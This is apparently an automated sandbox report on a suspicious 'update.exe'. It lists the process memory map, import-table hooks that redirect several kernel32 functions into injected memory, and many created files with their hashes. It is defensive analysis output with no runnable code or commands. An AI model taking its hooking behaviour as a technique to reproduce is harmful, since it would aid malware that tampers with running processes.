private_0x00000000089d0000	0x089d0000	0x08a0ffff	Private Memory	rw	-
private_0x0000000008a70000	0x08a70000	0x08a7ffff	Private Memory	rw	-
private_0x0000000008a80000	0x08a80000	0x08b7ffff	Private Memory	rw	-
private_0x0000000008b80000	0x08b80000	0x08c7ffff	Private Memory	rw	-
private_0x0000000008c80000	0x08c80000	0x08c8ffff	Private Memory	rw	-
private_0x0000000008c90000	0x08c90000	0x08daffff	Private Memory	rw	-
private_0x0000000008e60000	0x08e60000	0x08e9ffff	Private Memory	rw	-
pagefile_0x0000000008ea0000	0x08ea0000	0x091e2fff	Pagefile Backed Memory	r	-
wow64win.dll	0x73ff0000	0x7404bfff	Memory Mapped File	rwx	-
version.dll	0x74d50000	0x74d58fff	Memory Mapped File	rwx	-
fwpuclnt.dll	0x74d60000	0x74d97fff	Memory Mapped File	rwx	-
rasadhlp.dll	0x74da0000	0x74da5fff	Memory Mapped File	rwx	-
wship6.dll	0x74db0000	0x74db5fff	Memory Mapped File	rwx	-
mswsock.dll	0x74dc0000	0x74dfbfff	Memory Mapped File	rwx	-
pnrpnsp.dll	0x74e00000	0x74e11fff	Memory Mapped File	rwx	-
netprofm.dll	0x74e20000	0x74e79fff	Memory Mapped File	rwx	-
wshtcpip.dll	0x74e90000	0x74e94fff	Memory Mapped File	rwx	-
winrnr.dll	0x74eb0000	0x74eb7fff	Memory Mapped File	rwx	-
napinsp.dll	0x74ec0000	0x74ecffff	Memory Mapped File	rwx	-
npmproxy.dll	0x74ed0000	0x74ed7fff	Memory Mapped File	rwx	-
rpcrtremote.dll	0x74ee0000	0x74eedfff	Memory Mapped File	rwx	-
nlaapi.dll	0x74ef0000	0x74efffff	Memory Mapped File	rwx	-
sensapi.dll	0x74f00000	0x74f05fff	Memory Mapped File	rwx	-
rtutils.dll	0x74f10000	0x74f1cfff	Memory Mapped File	rwx	-
rasman.dll	0x74f20000	0x74f34fff	Memory Mapped File	rwx	-
rasapi32.dll	0x74f40000	0x74f91fff	Memory Mapped File	rwx	-
ntmarta.dll	0x74fa0000	0x74fc0fff	Memory Mapped File	rwx	-
profapi.dll	0x74fd0000	0x74fdafff	Memory Mapped File	rwx	-
comctl32.dll	0x74fe0000	0x7517dfff	Memory Mapped File	rwx	-
rsaenh.dll	0x75180000	0x751bafff	Memory Mapped File	rwx	-
cryptsp.dll	0x751c0000	0x751d5fff	Memory Mapped File	rwx	-
dhcpcsvc.dll	0x751e0000	0x751f1fff	Memory Mapped File	rwx	-
msvcr100.dll	0x75200000	0x752befff	Memory Mapped File	rwx	-
dnsapi.dll	0x752c0000	0x75303fff	Memory Mapped File	rwx	-
winnsi.dll	0x75310000	0x75316fff	Memory Mapped File	rwx	-
iphlpapi.dll	0x75320000	0x7533bfff	Memory Mapped File	rwx	-
winmm.dll	0x75340000	0x75371fff	Memory Mapped File	rwx	-
mpr.dll	0x75380000	0x75391fff	Memory Mapped File	rwx	-
msimg32.dll	0x753a0000	0x753a4fff	Memory Mapped File	rwx	-
wow64cpu.dll	0x754a0000	0x754a7fff	Memory Mapped File	rwx	-
wow64.dll	0x754b0000	0x754eefff	Memory Mapped File	rwx	-
cryptbase.dll	0x755e0000	0x755ebfff	Memory Mapped File	rwx	-
sspicli.dll	0x755f0000	0x7564ffff	Memory Mapped File	rwx	-
msctf.dll	0x75650000	0x7571bfff	Memory Mapped File	rwx	-
advapi32.dll	0x75720000	0x757bffff	Memory Mapped File	rwx	-
normaliz.dll	0x757c0000	0x757c2fff	Memory Mapped File	rwx	-
ws2_32.dll	0x757d0000	0x75804fff	Memory Mapped File	rwx	-
ole32.dll	0x75810000	0x7596bfff	Memory Mapped File	rwx	-
msasn1.dll	0x75970000	0x7597bfff	Memory Mapped File	rwx	-
crypt32.dll	0x75980000	0x75a9cfff	Memory Mapped File	rwx	-
usp10.dll	0x75b30000	0x75bccfff	Memory Mapped File	rwx	-
wininet.dll	0x75bd0000	0x75cc4fff	Memory Mapped File	rwx	-
imm32.dll	0x75d30000	0x75d8ffff	Memory Mapped File	rwx	-
msvcrt.dll	0x75d90000	0x75e3bfff	Memory Mapped File	rwx	-
lpk.dll	0x75e40000	0x75e49fff	Memory Mapped File	rwx	-
user32.dll	0x75e50000	0x75f4ffff	Memory Mapped File	rwx	-
kernelbase.dll	0x75f50000	0x75f95fff	Memory Mapped File	rwx	-
shell32.dll	0x75fa0000	0x76be9fff	Memory Mapped File	rwx	-
wldap32.dll	0x76bf0000	0x76c34fff	Memory Mapped File	rwx	-
iertutil.dll	0x76c40000	0x76e3afff	Memory Mapped File	rwx	-
shlwapi.dll	0x76e40000	0x76e96fff	Memory Mapped File	rwx	-
sechost.dll	0x76ea0000	0x76eb8fff	Memory Mapped File	rwx	-
urlmon.dll	0x76ec0000	0x76ff5fff	Memory Mapped File	rwx	-
oleaut32.dll	0x77000000	0x7708efff	Memory Mapped File	rwx	-
psapi.dll	0x770c0000	0x770c4fff	Memory Mapped File	rwx	-
rpcrt4.dll	0x77150000	0x7723ffff	Memory Mapped File	rwx	-
gdi32.dll	0x77290000	0x7731ffff	Memory Mapped File	rwx	-
clbcatq.dll	0x77350000	0x773d2fff	Memory Mapped File	rwx	-
kernel32.dll	0x773e0000	0x774effff	Memory Mapped File	rwx	-
private_0x0000000077690000	0x77690000	0x777aefff	Private Memory	rwx	-
private_0x00000000777b0000	0x777b0000	0x778a9fff	Private Memory	rwx	-
ntdll.dll	0x778b0000	0x77a58fff	Memory Mapped File	rwx	-
nsi.dll	0x77a60000	0x77a65fff	Memory Mapped File	rwx	-
ntdll.dll	0x77a90000	0x77c0ffff	Memory Mapped File	rwx	-
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	r	-
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	r	-
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	r	-
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	r	-
private_0x00000000fff9e000	0xfff9e000	0xfffa0fff	Private Memory	rw	-
private_0x00000000fffa1000	0xfffa1000	0xfffa3fff	Private Memory	rw	-
private_0x00000000fffa4000	0xfffa4000	0xfffa6fff	Private Memory	rw	-
private_0x00000000fffa7000	0xfffa7000	0xfffa9fff	Private Memory	rw	-
private_0x00000000fffaa000	0xfffaa000	0xfffacfff	Private Memory	rw	-
private_0x00000000fffad000	0xfffad000	0xfffaffff	Private Memory	rw	-
pagefile_0x00000000fffb0000	0xfffb0000	0xfffd2fff	Pagefile Backed Memory	r	-
private_0x00000000fffd5000	0xfffd5000	0xfffd7fff	Private Memory	rw	-
private_0x00000000fffd8000	0xfffd8000	0xfffdafff	Private Memory	rw	-
private_0x00000000fffdb000	0xfffdb000	0xfffddfff	Private Memory	rw	-
private_0x00000000fffde000	0xfffde000	0xfffdefff	Private Memory	rw	-
private_0x00000000fffdf000	0xfffdf000	0xfffdffff	Private Memory	rw	-
private_0x00000000fffe0000	0xfffe0000	0x7fffffeffff	Private Memory	r	-
For performance reasons, the remaining 45 entries are omitted. The remaining entries can be found in flog.txt.

Hook Information

Type	Installer	Target	Size	Information	Actions
IAT	private_0x00000000005f0000:+0x13567	13. entry of update.exe	4 bytes	kernel32.dll:GetCommProperties+0x0 now points to private_0x00000000005f0000:+0xb006a	... Actions Go to Installer Region Go to Target Region
IAT	private_0x00000000005f0000:+0x13567	14. entry of update.exe	4 bytes	kernel32.dll:GetThreadSelectorEntry+0x0 now points to pagefile_0x0000000000a10000:+0x4677e8	... Actions Go to Installer Region Go to Target Region
IAT	private_0x00000000005f0000:+0x13567	18. entry of update.exe	4 bytes	kernel32.dll:GetLastError+0x0 now points to pagefile_0x0000000000010000:+0x25d7	... Actions Go to Installer Region Go to Target Region
IAT	private_0x00000000005f0000:+0x13567	21. entry of update.exe	4 bytes	kernel32.dll:SetLastError+0x0 now points to private_0x00000000005f0000:+0xb006a	... Actions Go to Installer Region Go to Target Region
IAT	private_0x00000000005f0000:+0x13567	22. entry of update.exe	4 bytes	kernel32.dll:CompareStringW+0x0 now points to pagefile_0x0000000000a10000:+0x46c7e8	... Actions Go to Installer Region Go to Target Region
IAT	private_0x00000000005f0000:+0x13567	24. entry of update.exe	4 bytes	kernel32.dll:GetLocaleInfoW+0x0 now points to pagefile_0x0000000000a10000:+0x20043	... Actions Go to Installer Region Go to Target Region
IAT	private_0x00000000005f0000:+0x13567	26. entry of update.exe	4 bytes	kernel32.dll:GetProcessHeap+0x0 now points to pagefile_0x0000000000010000:+0x25b7	... Actions Go to Installer Region Go to Target Region
IAT	private_0x00000000005f0000:+0x13567	37. entry of update.exe	4 bytes	kernel32.dll:FreeLibrary+0x0 now points to pagefile_0x0000000000a10000:+0x138be8	... Actions Go to Installer Region Go to Target Region
IAT	private_0x00000000005f0000:+0x13567	64. entry of update.exe	4 bytes	kernel32.dll:MultiByteToWideChar+0x0 now points to pagefile_0x0000000000a10000:+0xd28d56	... Actions Go to Installer Region Go to Target Region

Created Files

Filename	File Size	Hash Values	Actions
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\desktop.ini	0.39 KB	MD5: 573c4619283bea55f656418e7a47ef9e SHA1: 379b24e22bc849ea329b64b550e58ce04bfd7fc7 SHA256: 55726745cfb18de18b1e5d3538663389b1dfb63e1e779af5c8714ff8806b6f1a SSDeep: 12:ilZ9RF+tHms0asc9uG8X09wgkvhHp6rD6QlJZd:il32hsPTX3gkpHiflJZd	... File Actions Show Properties Download
C:\Users\All Users\Microsoft\Network\Downloader\qmgr0.dat.INFOWAIT	4.00 MB	MD5: edb32db28bde40a9b075f0d12bd406be SHA1: a3cf38ad0f54b2bb2678ace2b6374ff01b551da8 SHA256: 0562f6e831db7346b85e6445922a33af9f74116f3a8b0989de50af44277629ad SSDeep: 3072:OZhWeFD2G8ILChmRZ6hFg4RlqCJbiatNDXxAdZ1dfGZn3Gqa1ZH+p2I7dxz+tET:OZhSlSZSFJRl3BrDXxAdnIGqa1ZGz+	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Money.url	0.13 KB	MD5: 8e6127837f2a4036b90fc231d50da1c6 SHA1: 03e61efc62ad73289bde84dbc3b3787830442730 SHA256: 932067b496f0085b72cfefe27eeae1f322a13d40527ac7724826795f109faf47 SSDeep: 3:afwSkqOCAPkOfaO7dvjYPDz58Q0xz6vtkdzN9exub0Trzr7s:afwSkeMRRkPDz58dz6vtkhirw	... File Actions Show Properties Download
C:\ProgramData\Microsoft Help\MS.GRAPH.14.1033.hxn	0.32 KB	MD5: c87b5630b7c3ee1f0392836961bb0bb0 SHA1: 3bb7af6c1d663bd3b732b11aa94e3faaee6c058d SHA256: a790e488e5b022f07458075bae29470b7eb097f8f0dd099f401e45caacf72306 SSDeep: 6:gnGRZO9XioszlMvV0xzNPn2JXq3K9fNIamKpCiGSOxje0IAZLcjEWHSFmOltPR2:K+LlMvyxzNvm6aHIamKhYje0I8cAWHSO	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\desktop.ini	0.39 KB	MD5: 6f13f9a17e32b7ea7ecc13cce3c4cb03 SHA1: a195f790f49ff3b7bf2b8a4cff4719f033712c24 SHA256: 3695731322c04a7865076febcc41955cf80dc77b456d4f97ac4e66d1270ebac6 SSDeep: 12:ilZ9RF+tHms0asc9uG8X09f2kvhHp6rD6Qled:il32hsPTXtkpHifled	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Music\nvyg\U0AZd0ivGrf _Re 2c.mp3	55.25 KB	MD5: 8b5bfb556ac1b276766db5ec90771e6c SHA1: fa87deb21ab7f30af37b9b7febc7a0be32339004 SHA256: 529dd33fe0e56a110bbf4406e19f3b9a3faab00ff87d30cd23e65fc8cc9e7411 SSDeep: 1536:CHyKFevRkuqybWXMjdEZqvylguWl07wT2pAFFSrlyDqZ:Memmi0EZqDVS7TuYyDe	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\c30-G7I4Ib7Y-VxrTcg6\yqgAGD0mq69zIZ\hT-SqtZX\c4-yyhR.ods	85.10 KB	MD5: 70085e0ff8d61ba37ddbe968f10364fe SHA1: 4633f3e6d090d2e1215af3bd14211107fa5d57ac SHA256: e17765a605cf4c4a9ada67b3cc95f17be5e29b034f4248360b5a52206c4cd9cd SSDeep: 1536:4MAOukWUxy1DBV5i53F8zxhYPzVu03YIF8KWmhuKEaEKLVYojcO:RFuVBVk52+VDhFbWMuKE8YoV	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSNBC News.url	0.13 KB	MD5: 7df9521906640f9f933b5e70b0a054e7 SHA1: 111554ed345b6fee98657c405a3c2d09a35431e9 SHA256: e4bdad8f42ac5b8a8fca4650b85c109f691c31a0876652c6dbe167dd284d3b1b SSDeep: 3:afwSkqOCAPkOfaO7dvjYPDz58Q0xz6vtkdzN9exub0SnHs:afwSkeMRRkPDz58dz6vtkhjM	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\lulcit amkdfe.contact	1.15 KB	MD5: 223d6267f0d5f5d1b3e7187e186247b5 SHA1: 9ba501a7cd2464e6bbab4f6261815cd61577d966 SHA256: 57cd880b6013d5364e05222248c242251a34afd7eb40eee1df5c9baec1c823a6 SSDeep: 24:ILozN0UmhL6Kusu9l0xqZAhf4+M2D+j8/q3Vy5nb4Lh:IgLkCX96hej8/q+nb4Lh	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\c30-G7I4Ib7Y-VxrTcg6\yqgAGD0mq69zIZ\l8fJ\YeV-uPfMbHLLcGMe_f.odt	75.51 KB	MD5: 9d86a757963431f62ed65ca6b2aff33c SHA1: 504a7f65ad899567368069bed6eb59ba9902af85 SHA256: 2f26018960333efb6c08ddd1c371e59ea6adab7a04c257609c89ca7afa8f3bac SSDeep: 1536:cqd+hAJT+19H2EPjwl9imUtujyGIhsB315LYtT3EslCwZcxtrKet:fd+hT1VE9i5t4yGPYx3EwCwZutrK0	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Music\rXoVxt3oiS\O5g4jLerSHDy3Pf8Z8r\2qDES9yWeof3.wav	9.97 KB	MD5: 56256c58270d95799b7cb9c4b5909b4b SHA1: d0f5b6069bc9ea5d05ad12d6fef59aaca0a3b4ef SHA256: 30e567a0ced1635fa40c87828b72a998df442f5d34c05eee6f75a15c27f87211 SSDeep: 192:DgWcOH+aWpVpXvu3zkAtB9Jwqq8323PqqtWxdJK3AjcF9mQAdkcm:kWRHf6Vw34An9Ju8uIXu9jGlm	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\c30-G7I4Ib7Y-VxrTcg6\yqgAGD0mq69zIZ\skaVx\EoZDJddZ6evy.pptx	59.50 KB	MD5: 4ebc9bb5e37285c0409369e65abcc957 SHA1: edc79f442793c2fb934ecefbdc2fb0c7e4f85c18 SHA256: 151a0a0b4071841816c6b5e12379e01de4e86d350a399b29b9177d0be1d23919 SSDeep: 1536:oxPecUSuxu7IAMhdzveNSaO5epGedpNp6XaoZN:Iuxu7IAMhdzveB9xdpNsd	... File Actions Show Properties Download
C:\ProgramData\Microsoft Help\MS.OUTLOOK.DEV.14.1033.hxn	0.35 KB	MD5: 6fb715b464aff6e49ddcd5dd751f5d6a SHA1: b698130a3bed8b5ad15233d0d505d1bb5290d73c SHA256: ae46538af467c5d029af5644ce0eeaed5f00d1de85c45e610976d669f7c720a3 SSDeep: 6:gnvUEg6sbDtpJ6K7pD+ZifNHZnHjNQseFu0+VQ+DypUqwi92y1MeUqd1:K8Eg6sntpndiIFV2sezB+DJbi9V1qqd1	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Music\4fONS\zDJHX2UBtq2jNGLqtNRG.mp3	47.75 KB	MD5: f921b641e6b27ab366b820ee6c4d5079 SHA1: 0d98085940b9ade82e131443ad98fb39218470c2 SHA256: 6ffc65fae22ca431396bb18a34c3c699db9eba70141eb8f5c87b8d222f9b010a SSDeep: 768:q0Uwzbxp2WgKcmiNYSnRwxOd9SnwEizX2UEQE0cZuoGcpgN47jKK6Su6Ye:lxbTZriNYSneObIzi9E04RGcX68Ye	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\I_5X.xlsx	67.93 KB	MD5: af9a57eebb0bb5f0cf760743d390c3d8 SHA1: 8312750d410f09d391ff4085e8c02ceada062319 SHA256: 4465a041bc44b2d75979a485eb7fd8a25e9d6b6e7d103486907fb97119d29202 SSDeep: 1536:6KsmNCbBhaPwCCRts4ogT0IZLes8ac9l6+kwTLlyN4Mix++F6V:1hQbBhKAUGT0YKsU9rBTL4/t	... File Actions Show Properties Download
C:\ProgramData\Adobe\ARM\Reader_10.0.0\AdbeRdrUpd10116_MUI.msp	10.00 MB	MD5: 2ec3fdcfa2ed1287163b43cf36ab604a SHA1: 32d555ca6e4784a1f9109f7c0c622c1d30681b68 SHA256: 0b29cca75fd26391ea614b2b12eb95fc37bbf80b63e7cda6857e3426f09f26bb SSDeep: 196608:C+vjzyOui6r+Qo4iT6YqQitS7+KgxUzGVw9vV+Ud5CP46ZjNK:FrN67xdBISxUzGVw7+YMggK	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\c30-G7I4Ib7Y-VxrTcg6\yqgAGD0mq69zIZ\hT-SqtZX\U9tSiBmpae-S.ppt	77.17 KB	MD5: b6be1b223d05269aa39da5fb8fbe1d3a SHA1: 991d9e2d3cd6c496ed9d09a8a320f4bc4485debf SHA256: 1de7893586d38a19157bcb70d890a673e3fbcf5d3173284a13f466b3e8468386 SSDeep: 1536:n9FV37gTqP0y1f+dbK8fxteFA/ByKZGCjI9pkL9NiTTr84syBX7eV8:NgTqPB1fqbDxAApDNjb6rnjreV8	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Saved Games\desktop.ini	0.28 KB	MD5: 436b5c9eda5f59dd3ba6cb306e72ef19 SHA1: d159de7699ba26507f9ccdabd10a9af1085a591d SHA256: 0d69074af3649d15488c9a581c0636cafeaf1441cc4036f4967545e4214eeed0 SSDeep: 6:Chp3bZ9tz20guqtHO7oxR+asti5K59q5GYigX1OPlL:ilZ9RF+tHms0astiA9uG8X09L	... File Actions Show Properties Download
C:\ProgramData\Adobe\ARM\Reader_10.0.0\AdbeRdrSecUpd10111.msp	246.00 KB	MD5: 9c7a1894da76029cbf9ffc995c5bb62a SHA1: 71845d6e90551ed90521c31170d954b4d0f3041d SHA256: 7f35b49c07ebd864efcf8b1ca5c1c2a4d19fda69a6964df3e3c8c944a4594cc9 SSDeep: 6144:EfexQRnQ3FKZ8tUOg90gLDIaNbyp8ElSRDVEB2cAFHxdvHPmA09/P6q5dA:EfDt8tPcIaNe8	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\zu1 _on\ubh3Kx_A\_NTc8TO6LpPJ5zXjg.gif	83.08 KB	MD5: 5563980f61c18a89f2f23f8133c18d65 SHA1: e9f6074211a015eee6be3a4f85f7c5349d34cb1c SHA256: 1ebf51bc9c44b14c6857bb244b84615ffc821f6ad95ac7a53e3c0f7a0f3d2f5f SSDeep: 1536:MGKwa3zn3h4YqeYwC05psbibrKvOeimjxXFerIhmCuk3oIA:MGCzn3KYfhC055udFVkIhHf3o5	... File Actions Show Properties Download
C:\ProgramData\Microsoft Help\MS.INFOPATH.14.1033.hxn	0.34 KB	MD5: d014dde20e3ae271afc73170d993dcf8 SHA1: 38576c28a4c7782fccb5184bb55d0a2af6a59e34 SHA256: a8dffba703b4612ec1ec3da3dabf07490deb326cfb30dcfe19c67a17e002a370 SSDeep: 6:gn9p0BLjFu2LZGckH6WM9356uawQkCqvm2f7jDbDy8JImcI35mWTap:K9mBMuJksY9Nqvm2fPDbDBXnTap	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\c30-G7I4Ib7Y-VxrTcg6\yqgAGD0mq69zIZ\Dkb64er\r7-FdG2eJ6-ET_j.doc	23.69 KB	MD5: 9208d9048e1447774b512c3d2dfe0111 SHA1: d677d238cd417469e816a003affc770dfdcfa564 SHA256: 2ab61c0c519bbcf8031721a7096836fdaad4f2af6e7cc976af1615716deea84d SSDeep: 384:1oFuLERcCJ9wO1Iz1sdSfdAEfUTCrHNcbZNHcYhLZH0FAksqVue6mBeCreTHUKQf:1oFIUZ2O1czCEfNcbZ5cYhLZLk8hmHlR	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\Microsoft At Home.url	0.13 KB	MD5: 89c6a97cd067a0ca538e17acac7a7563 SHA1: 5aa3f2cde3d1f5f9aa4e4f65299d08c9e5186b9d SHA256: 586cb74ef5013973bb9775cd4c14c52cae76f336091e037d9ff96c5f9f3f54dc SSDeep: 3:afwSkqOCAPkOfaO7dvjYPDz58Q0xz6vtkdzN9exODqQKs:afwSkeMRRkPDz58dz6vtkhnd	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\My Shapes\desktop.ini	0.21 KB	MD5: da6a43268d24113ab42bd68ff9a1cd37 SHA1: d0bb61453d0443ae1c50b7a028be7e4c89d778a1 SHA256: 489c4c01842875dfc869795baaec0cf3cdcf77aef7b58af6db7a194e146340e0 SSDeep: 3:roL5hucUG3nlBFZx9JJCUzKEETUbi+wVqDgU/FcZgIkHShlEMKynH0DfbY40+:Chp3bZ9bZoUG+19cZzkHSha4if847	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\zu1 _on\n7JpqV\ZEsdNS.jpg	27.63 KB	MD5: 06b8c6b26bd8079d22afc99c5489fd46 SHA1: c794609ad41874e67b6e2d8c95cd16154522e783 SHA256: e8e8fd8ae12e6e5d171db13875f91adfc64c79f8fc73625cf2ae0c5315d021b2 SSDeep: 768:UndHo1JSVUpa9w5psMr5uuQvQyB7GARXRIKc6v:i0SVmaFMr5uuQvNRhdc6v	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\c30-G7I4Ib7Y-VxrTcg6\yqgAGD0mq69zIZ\Dkb64er\hs9eu0cg_VHy7\shTUZEa.ppt	58.94 KB	MD5: 760c0a8fa3bf6cbc95d050d30def9ca0 SHA1: 714746a8b8accec7404bfc9a18f18ed973bc7155 SHA256: b30d59cb361d0951e4aa063c82b5522a00a7138edcd681dd4d531cbc2299fc97 SSDeep: 1536:QPnFgYhumDDx/TUyCCbpL+xJtEWkCs0l3Bs5LbfuCV:QvFgY88x/T5FEEWkL0hCtfd	... File Actions Show Properties Download
C:\ProgramData\Microsoft Help\MS.SETLANG.14.1033.hxn	0.33 KB	MD5: a627b84625714b4b311063fd4d1070e6 SHA1: ab25c8a0816b2fc8d873cbfb68ba6520427c5182 SHA256: 93ce6f596e290e558cdad9f364dbe9266960d18837fc1b9be31cbdf838399e12 SSDeep: 6:gnlmWgpdq78pROxKpbZq6SmGj7fdiGIdzjAz9Fz9zPk2n+8vNpSKbkm:KvwPp5Gj71iGI50xJ9zc2nzvNpJB	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Windows Live Spaces.url	0.13 KB	MD5: 8230430a05cf63da9268dee0a2b1f1c8 SHA1: 3385f29007be055ef1811ffe3c8a38c3c51610a9 SHA256: f18180edb6796a812dc81e77d54d7c1a5ab4990718ea545f8d9bf755c216a160 SSDeep: 3:afwSkqOCAPkOfaO7dvjYPDz58Q0xz6vtkdzN9exub0XWSHs:afwSkeMRRkPDz58dz6vtkhmW9	... File Actions Show Properties Download
C:\ProgramData\Microsoft Help\MS.MSOUC.14.1033.hxn	0.32 KB	MD5: 1a3018299118e95db33c9c1dbe653ad0 SHA1: 2f05213d2a13f7502ffa50ac2c77f9d9bb1c88ae SHA256: 79a220102359dba6ab8fb6e6d82859225af3e2353145cd9f6574f99ddca01325 SSDeep: 6:gnG8ABxaw2UtohMvV0xzNPn2JXq3K9fNIamKpCiGSOxje0IAZLcjEWHSFmOltPR2:KKWNMvyxzNvm6aHIamKhYje0I8cAWHSO	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\zu1 _on\QaUjhe\8q988doXb.png	60.05 KB	MD5: 2d3b9ea8f22c5afbeed5c81a3c9a222b SHA1: 14db5bf44b1a81675cfa8ffdb4899002d3eb9ebb SHA256: 2e338af6734aac0a84fc68da62bacaab3aef91f72cecbb0675cf2707439e893b SSDeep: 1536:ybGFjShz67uVXxOaITJHGq06dVqpMz50EKrAyswR:ybGizmuVX+NGqVqy3xY	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\fpsQYKF MOi0MA.flv	2.33 KB	MD5: 3bf92e6642fc5eae1019c3b7e30f15ff SHA1: 6319fe4404de5d20e8e528620e625d5f307f6598 SHA256: 36da7558173e970b8b66d76c686a0b5fb10ed07e12e1fe5f6c251569d21243c9 SSDeep: 48:gpqk2cw+R1OkVVKawB6OycrElautUCg+oaU8tmSC4DEAO0mv2/3/9d74:g3nOSxSru+Kw8tB9E9+/3nk	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Searches\desktop.ini	0.51 KB	MD5: d5e80eef3f50fb317b6eed39ea0aee8a SHA1: 637b72b3ae9fa509e8e30f2d7ffae40eaf73efbf SHA256: 0aa3a0e5032b595baaef93c36660b8569ce2a626524e505dfca9a692257863f8 SSDeep: 12:ilZ9RF+tHms0a8T3NxnmUYq409jxdnr0KGhKS9P1x2hc4vv:il32h8TTz4GdngfP10hcSv	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\zu1 _on\n7JpqV\8ctUF06 2SC36xX7cR0\luqHM\l7-qaXxV0q.gif	62.68 KB	MD5: 7b60e5d3d38102d37b187b36f5eae790 SHA1: 1afc20dd713d42d8f35d0e853c2511c081df8df8 SHA256: 86a7f917c431d4f56cb3e6aaed9af459250bba4ab48c34d2616ed019ead47245 SSDeep: 1536:cPeqW/YTJzS5NiLCu3JfCPicHaU/YQykTXceDddh2j6JqI6jlONP:cWq5wPiL15fOVaUfbR6mgzhyP	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\c30-G7I4Ib7Y-VxrTcg6\yqgAGD0mq69zIZ\Dkb64er\hs9eu0cg_VHy7\d8R9rMlCN.odp	9.12 KB	MD5: e5c025a52b3cf3cbf116bd55d68f988c SHA1: 00873e6b62bc2422bc7286bb4fcb4f033ed86d66 SHA256: 2dd07a7566d0377e0ea9729acfac6fae99dbd51e1b2102865fefe3766d8690b4 SSDeep: 192:DfupTqMR3mNUImyQPfTsku+/f5qwXnJ7EUR/aSMdqwlVrI1Wl:TVMR3mNUImyYTsNkAUVXalV81Wl	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\36USA68T\imagesrv.adition[1].xml	0.01 KB	MD5: b7fc855b4810f0d20cfa328da83e22ef SHA1: c04d8472b055c9e2d6cc47b7242b303a57393187 SHA256: 0bceee388ddc1eac759296c53c33570937da6e04f4b0c4eb745f1f3be69deac6 SSDeep: 3:MyE:zE	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Links\Downloads.lnk	0.91 KB	MD5: 4c6ab99642f36538a6273507c1c7d03b SHA1: 66dd79c17ab4a1497e826a1653c3c31b66a0cea7 SHA256: 9412f1062553ac3914a021db700eb5c6d131cf1b8f7444a37a6eaf8ea51df49d SSDeep: 24:p3GQ6mbEp/NwPxcu3isE2uAZGtrgwabg9:pWCW/NqxcZp9AAJF	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\c30-G7I4Ib7Y-VxrTcg6\yqgAGD0mq69zIZ\FLEcvhR.xls	68.37 KB	MD5: 165ed90e7cbe51ed69fd68ebcce5a23f SHA1: d880fe9d067fd8ede6467be4da7e5db02e6b3ce6 SHA256: e1525ae5c14c46d7680565aa5b1400a202f4f3c18c115832e2e22f79f63fb5f1 SSDeep: 1536:LHsNH/6zJqUDqe3nXjjY2Q/eGE1vEbHEh3vVABcqp+q8F:TsB/6qUDtnE/eGmukh/VABzxk	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Music\nvyg\5Lx3KHr.mp3	69.14 KB	MD5: dc09071a8e469163629b7fb6a13959ba SHA1: 5be9a2724f0ec1c592e21bb9a325a0d3bcfd314c SHA256: 37ed08445a0f44154eddedf49178acc0e9683d0a0de1e638a9f27935b8f20138 SSDeep: 1536:o6e2unE3c6HqZgcM+nj4jD8VIzf6XwwTkKNY0hrM4GLVDNiY6:o6nsVgr+nk8y8TkugnVYB	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Links\Suggested Sites.url	0.23 KB	MD5: 866ab23c3a31ccc2a21033f862b0d8e5 SHA1: 706d94bc254e8b3b3269ecdc85cb0aee26ba4025 SHA256: 1796d73aa9ea7b3552c0b74fceb677954bbf2aef7e580a0a503332d7b7490051 SSDeep: 6:afwSkeMRRkPEUKwKTrWe7MjHEmx76XP3YJApF1AKTcN2ONWareNb:qx0HkMUKLWhjHEEmXwOpUKQNRfr0b	... File Actions Show Properties Download
